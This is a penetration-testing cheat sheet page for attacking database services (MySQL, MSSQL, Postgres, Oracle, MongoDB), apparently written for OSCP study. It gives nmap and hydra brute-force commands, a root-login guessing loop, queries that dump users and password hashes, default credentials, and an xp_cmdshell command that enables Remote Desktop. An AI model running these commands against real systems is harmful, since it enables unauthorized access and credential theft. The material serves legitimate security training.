search

Databases

hashtag
[3306,MySQL]

Links https://recipeforroot.com/mysql-to-system-root/arrow-up-right https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/arrow-up-right https://infamoussyn.wordpress.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/arrow-up-right https://www.electrictoolbox.com/shell-commands-mysql-command-line-client/arrow-up-right

https://sushant747.gitbooks.io/total-oscp-guide/list_of_common_ports.htmlarrow-up-right https://www.electrictoolbox.com/shell-commands-mysql-command-line-client/arrow-up-right https://highon.coffee/blog/lord-of-the-root-walkthrough/arrow-up-right

Very often has a root user, can be brute forced

nmap {nmap_extra} -sV -p {port} --script="(mysql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)"
nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv 192.168.31.139
nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306
mysql -h 192.168.100.138 -p

If you have a local shell try this bash script to override for the root account(worth a try) while [ 1 ];do mysql -u root --password=123; done

Connect to MySQL mysql -u root -p

## MySQL Database

mysql -h 192.168.100.138 -p

show databases;

use databasename;

show tables;

describe table;

select * from payments [where id=9];

select @@versionl

> /G instead of ; https://stackoverflow.com/questions/924729/how-to-best-display-in-terminal-a-mysql-select-returning-too-many-fieldsarrow-up-right

### Non interactive shell

mysql -uroot -proot -e 'show databases;'

mysql -uroot -proot -e 'use SkyTech; show tables;'

mysql -uroot -proot -e 'use SkyTech; select * from login;'

ENUM

SELECT @@version;

SELECT @@hostname;

SELECT @@datadir;

SELECT user();

SELECT system_user();

SELECT user FROM mysql.user;

SELECT host, user, password FROM mysql.user;

SELECT database()

DATABASES

SHOW DATABASES

SELECT * FROM information_schema.tables;

SELECT schema_name FROM information_schema.schemata;

SELECT distinct(db) FROM mysql.db — priv

TABLES

SHOW TABLES

SELECT table_name FROM information_schema.tables WHERE table_schema !=

‘mysql’ AND table_schema != ‘information_schema’

COLUMNS

DESCRIBE table

SELECT column_name FROM information_schema.columns WHERE table_schema

!= ‘mysql’ AND table_schema != ‘information_schema’

hashtag
[1433,1434,mssql] UDP 1433,1334

MS SQL Server Enumeration https://www.hackingarticles.in/mssql-peneration-testing-using-nmap/arrow-up-right https://www.adampalmer.me/iodigitalsec/2013/08/10/accessing-and-hacking-mssql-from-backtrack-linux/arrow-up-right http://travisaltman.com/pen-test-and-hack-microsoft-sql-server-mssql/arrow-up-right https://www.google.com/search?client=safari&rls=en&q=mssql+default+passwords&ie=UTF-8&oe=UTF-8arrow-up-right http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheetarrow-up-right

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip

Leverage xp_cmdshell to get a shell If xp_cmdshell is not turned on then you have to enable it. This requires "advanced options" to be on:

Enable Remote Desktop xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' go

Use Nmap to remotely execute commands through MS-SQL

Metasploit:

hashtag
Postgres 5432,5433

No root user but psql or postgres psql -h 192.168.100.138 -p 5433 -U root -w hydra -l postgres -P weak.txt postgres://192.168.100.138 psql -h 192.168.100.138 -p 5433 -U postgres

hashtag
Oracle port 1521,1541

https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573arrow-up-right https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#oraclearrow-up-right https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listenerarrow-up-right https://www.doyler.net/security-not-included/oracle-command-execution-sys-shellarrow-up-right https://security.stackexchange.com/questions/95729/oracle-sql-injection-reverse-shellarrow-up-right

  1. Enumerate version info (search for known vulns)

  2. Bruteforce TNS listener communication (not always needed)

  3. Enumerate/Bruteforce SID names (like database names)

  4. Bruteforce credentials for valid SID name discovered

  5. Try to execute code

Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htmarrow-up-right tnscmd10g status -h INSERTIPADDRESS a lot of default passwords available

Port 2100 - Oracle XML DB sys:sys scott:tiger

Oracle ports1
Oracle ports2
Oracle ports3
Oracle ports4

hashtag
No SQL

Often means no authentication, brute force is fast because design of databases like reddis

hashtag
[27017,mongod]

nmap {nmap_extra} -sV -p {port} --script="mongodb*" You may encounter NoSQL instances like MongoDB in your OSCP journies (/cgi-bin/mongo/2.2.3/dbparse.py). NoSQLMap can help you to automate NoSQLDatabase enumeration.

NoSQLMap Examples

NoSQLMap Installation

/usr/share/wordlists/SecLists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt hydra -C default_accounts.txt ftp://localhost

hashtag
MySql, Oracle, PostgreSQL, SQLlite, MS-Sql bruteforcer and database browser

hexorbase nmap {nmap_extra} -sV -p {port} --script="(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args="mssql.instance-port={port},mssql.username=sa,mssql.password=sa"

hashtag
[50000,DB2]

Previous[XSS] Cross Site ScriptingNextPivoting and Tunneling

Last updated